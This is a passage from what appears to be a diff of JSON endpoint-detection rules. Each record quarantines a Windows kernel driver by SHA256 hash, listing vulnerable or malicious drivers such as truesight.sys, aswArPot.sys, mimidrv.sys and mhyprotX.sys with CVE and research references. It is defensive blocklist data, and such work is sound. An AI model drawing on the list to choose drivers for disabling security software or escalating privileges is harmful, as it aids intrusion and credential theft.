+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835628Z",
+ "creation_date": "2026-03-23T11:45:30.835630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcf3456fa90bdac43a1f4c63fcfd9a8ad3b3a404a8c0f6a1a399a671d4a52ae5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb3c0b66-a239-59dd-8613-d33b8ec70ebf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826336Z",
+ "creation_date": "2026-03-23T11:45:30.826338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6ac5a594db3b536fe6b74f54a09055428fcefc2e9cf19124a910fc0e322ee0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb4fbb14-b40a-514e-84ba-c314b653152e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969541Z",
+ "creation_date": "2026-03-23T11:45:29.969543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bfad74a63ad223656a3b27fb3edc92bbef7dce431ccdb835d3cbae6a08a08f5",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb53ed46-1d61-5c0c-b0e3-e29d7a0db0ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488969Z",
+ "creation_date": "2026-03-23T11:45:31.488971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e987f8edeb917dbc06d1756d09ea983697e7062dfe33f34cae2183c22fae5bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb59b217-adf2-575f-9b86-9f84430f0332",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498091Z",
+ "creation_date": "2026-03-23T11:45:31.498095Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca08a2401b1ddb538b7883cee05360ecac816b0dc17a822fc23d6d05d6c1a0a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb5f708c-83df-5e62-ba3f-ab4a718570b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146378Z",
+ "creation_date": "2026-03-23T11:45:32.146380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146385Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3b12d9f35f9acd46d7e21627ad3e29149d203e211d665a3e03103f9cb7e4b86",
+ "comment": "Vulnerable Kernel Driver (aka wsftprm.sys) [https://www.loldrivers.io/drivers/30e8d598-2c60-49e4-953b-a6f620da1371/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb5ff984-80b7-5b80-b6ae-0c3f11051500",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807254Z",
+ "creation_date": "2026-03-23T11:45:31.807270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807283Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1264becef907f7f33e8ba9106375e7c902b8835e58b10f9b54a54c2de7db2e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb777081-0212-53e9-a817-97a8f87223da",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822709Z",
+ "creation_date": "2026-03-23T11:45:31.822712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a04658d24014cde98165b44854d4d64b0fc908bc20d6ab3c8d89fef31b48661",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb77fda6-5e02-5a98-82b5-b47380399b4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469162Z",
+ "creation_date": "2026-03-23T11:45:30.469165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dd2620e1c844738429ba31e2545a8b2de1387117e4f24d6fe7fd4246b09ac39",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb823228-c5ff-5ed2-ac22-b3d76613c9df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830052Z",
+ "creation_date": "2026-03-23T11:45:31.830054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830059Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edacedc3c79728d1958506890c461ff0cd15735309a26cbe4308befbf527c23d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb83c7c0-829e-5cd5-aa39-08fd9a7c785d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464034Z",
+ "creation_date": "2026-03-23T11:45:30.464037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb845f78-6d05-5590-9971-bad3cdbd7a3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141733Z",
+ "creation_date": "2026-03-23T11:45:31.141735Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "702fcd3be8e060e1aa22b9854e14bcf312425c388c2ce9185cd082430c555e9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb999384-d931-596b-b79a-1b771f337164",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830473Z",
+ "creation_date": "2026-03-23T11:45:30.830475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47dd83a8770fc755c1cc0440ef1baa1e262b03a774f200276b1b82ae5b7ed4f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbb09f38-bb2a-5a74-b1ad-be76aa2c6f93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815309Z",
+ "creation_date": "2026-03-23T11:45:31.815310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdfa1c5aade70879639bcfd4f08ab909d0e7479e74817f42a4af2d49d80b5f85",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbb88b8c-e5fe-5482-ba8f-01073e71b7a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833643Z",
+ "creation_date": "2026-03-23T11:45:30.833647Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28124094439a1fb9a8988bcfb37bd02f21988c4a74ecd8f869466102cc3d2bf5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbb8fde8-3eb9-588a-b63d-b434b6101cfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608777Z",
+ "creation_date": "2026-03-23T11:45:29.608779Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5a2fe8ab935cf47f21e0c5e0de11a98271054109827dc930293b947d3b05079",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbdabf3e-4a4d-574c-811b-af696ffa7630",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621193Z",
+ "creation_date": "2026-03-23T11:45:29.621195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621202Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3966edd6b2291aad8ce21f35f85ea18a60e5c382891809bf4d4e07d0b0c61a8",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbde88ba-f337-5cd1-b29d-272203753854",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980098Z",
+ "creation_date": "2026-03-23T11:45:29.980100Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980105Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbe92855-d0b8-598c-aec6-5c24529e370c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475697Z",
+ "creation_date": "2026-03-23T11:45:31.475701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce90d578ca16d80e853080a5bc7daf91130b02ec8a76c73f7d0b66c4a9600ba5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bbf85d81-be35-58e9-ae72-96781c300730",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457803Z",
+ "creation_date": "2026-03-23T11:45:30.457806Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7b79fe1377b3da749590c080d4d96e59e622b1013b2183b98c81baa8bf2fffe",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc23c5ab-062c-5d98-85cf-920cb46b7a47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612146Z",
+ "creation_date": "2026-03-23T11:45:29.612148Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612154Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df3fd9fa267e12d7c6b65028373e21978041f0c94375b5c7316498fbad6f4ae0",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc338102-66c0-5989-9b17-42f74e11fded",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613495Z",
+ "creation_date": "2026-03-23T11:45:29.613497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "904d8d0db7b3ed747ecfbb04386dfbe23b71ffd054f32ab17f65bc17d500f730",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bc3c1461-a090-5a30-846f-a9eab6d90afe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971309Z",
